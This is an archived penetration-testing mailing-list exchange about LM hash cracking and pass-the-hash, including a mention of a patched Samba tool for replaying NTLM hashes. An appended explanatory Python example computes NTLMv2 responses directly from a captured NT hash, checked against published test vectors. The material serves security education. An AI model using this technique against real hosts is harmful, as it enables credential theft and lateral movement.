Penetration Testing mailing list archives

Re: Windows XP / 2K3 Default Users


From: jmk <jmk () foofus net>
Date: Wed, 01 Nov 2006 09:34:16 -0600

On Tue, 2006-10-31 at 17:27 -0700, Thor (Hammer of God) wrote:
> Maybe I'm just in a different environment, but when I see people report
> "routine" cracking SAM's, it really makes me wonder who the client-base is.
> I think the last time I was paid for any work with LM cracking was over 10
> years ago.  I've been turning off LM since Win2k came out, and have been
> telling people to use pass-phrases instead of passwords since Win2000
> allowed 126 character passcodes. Even something as simple as "my dog has
> fleas" couldn't be rainbow cracked with anything I've seen out there.  Of
> course, when you have a pass phrase like "OK, this is my passphrase--crack
> THIS 1 homeboy!" Then the whole thing goes out the window.
>
> That's what I was on about- while I think rainbow tables are neat, I've
> really not had much use for them given their size, having to have admin
> access to get the SAM anyway (for win machines) and how easy it is to thwart
> them.  But that's just me ;)

Unfortunately, it seems that the vast majority of clients I work with
still have LM hashes enabled and usually some relatively weak passwords.
John typically is able to crack the passwords quickly and, when it
can't, Rainbow tables work. I'm hopeful that we're slowly getting them
educated though.

We did run into a situation recently where a compromised workstation
contained an interesting account with only an NTLM hash. In order to use
that hash against other hosts, I've modified Samba to simply pass it.
Samba's "net" command can do lots of cool stuff, like add local user
accounts. My updated patch is available, if anyone wants it:

http://www.foofus.net/jmk/passhash.html

Joe


-- 
jmk <jmk () foofus net>
Foofus Networks
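
[Added example, not part of Joe's message and not his Samba patch or any Samba
code. It shows why "only an NTLM hash" is enough to authenticate elsewhere: the
NTLMv2 client computation (MS-NLMP 3.3.2) is keyed with the raw NT hash and never
sees the password, and the server verifies with the same stored hash, so a hash
lifted from one box is a password-equivalent credential on every host that
accepts it. MD4 is implemented inline because hashlib often lacks it. The user,
domain, challenges, timestamp and the "captured" hash are constructed here; they
follow the published MS-NLMP 4.2.4 test vectors so the output can be checked.]

```python
"""Pass-the-hash with NTLMv2: the NT hash, not the password, is the credential.

Standard library only; the MD4 core is written out so this runs without the
OpenSSL legacy provider.  Every input below is constructed for the example.
"""
import hashlib
import hmac
import struct

_MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 over an arbitrary byte string."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & _MASK

    f = lambda x, y, z: (x & y) | (~x & z)          # round 1 mixer
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)  # round 2 mixer
    h = lambda x, y, z: x ^ y ^ z                    # round 3 mixer

    # Padding: 0x80, zeros to 56 mod 64, then 64-bit little-endian bit length.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for mix, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + mix(b, c, d) + x[idx] + k) & _MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: next step works on old d
        state = [(s + v) & _MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)).  Unlike LM there is no 14-char cap
    and no case folding, so long passphrases get a real hash here."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nthash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash itself.  Note the input is the
    hash, which is why a stolen hash can be replayed without cracking it."""
    return hmac.new(nthash, (user.upper() + domain).encode("utf-16-le"),
                    hashlib.md5).digest()


def av_pairs(pairs) -> bytes:
    """Encode NTLM AV_PAIR target info (MS-NLMP 2.2.2.1), MsvAvEOL-terminated."""
    out = b""
    for av_id, text in pairs:
        value = text.encode("utf-16-le")
        out += struct.pack("<HH", av_id, len(value)) + value
    return out + b"\x00\x00\x00\x00"


def ntlmv2_response(nthash: bytes, user: str, domain: str, server_challenge: bytes,
                    client_challenge: bytes, timestamp: int, target_info: bytes) -> bytes:
    """NTProofStr || blob, as an SMB client sends it (MS-NLMP 3.3.2)."""
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    proof = hmac.new(ntowf_v2(nthash, user, domain), server_challenge + blob,
                     hashlib.md5).digest()
    return proof + blob


def demo() -> dict:
    # Constructed scenario: the attacker holds only this hex NT hash pulled from a
    # compromised workstation.  (It happens to be nt_hash("Password"), the MS-NLMP
    # test-vector password, so the result is checkable; an attacker need not know it.)
    captured = bytes.fromhex("a4f49c406510bdcab6824ee7c30fd852")
    server_challenge = bytes.fromhex("0123456789abcdef")   # from the target's CHALLENGE
    client_challenge = b"\xaa" * 8                         # normally random
    target_info = av_pairs([(0x0002, "Domain"), (0x0001, "Server")])
    args = ("User", "Domain", server_challenge, client_challenge, 0, target_info)
    from_hash = ntlmv2_response(captured, *args)
    from_password = ntlmv2_response(nt_hash("Password"), *args)
    # The verifier (DC or local SAM) also stores only the NT hash, so it recomputes
    # the same proof: hash and password are interchangeable on the wire.
    return {"nt_proof": from_hash[:16].hex(), "hash_equivalent": from_hash == from_password}


if __name__ == "__main__":
    print(demo())
```

The takeaway for the thread's scenario: turning LM off (Thor's advice) removes
the rainbow-table target, but the remaining NT hash is still all an attacker
needs to authenticate as that account on any other host where it is valid; that
is exactly the use Joe describes for his patched "net" command.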

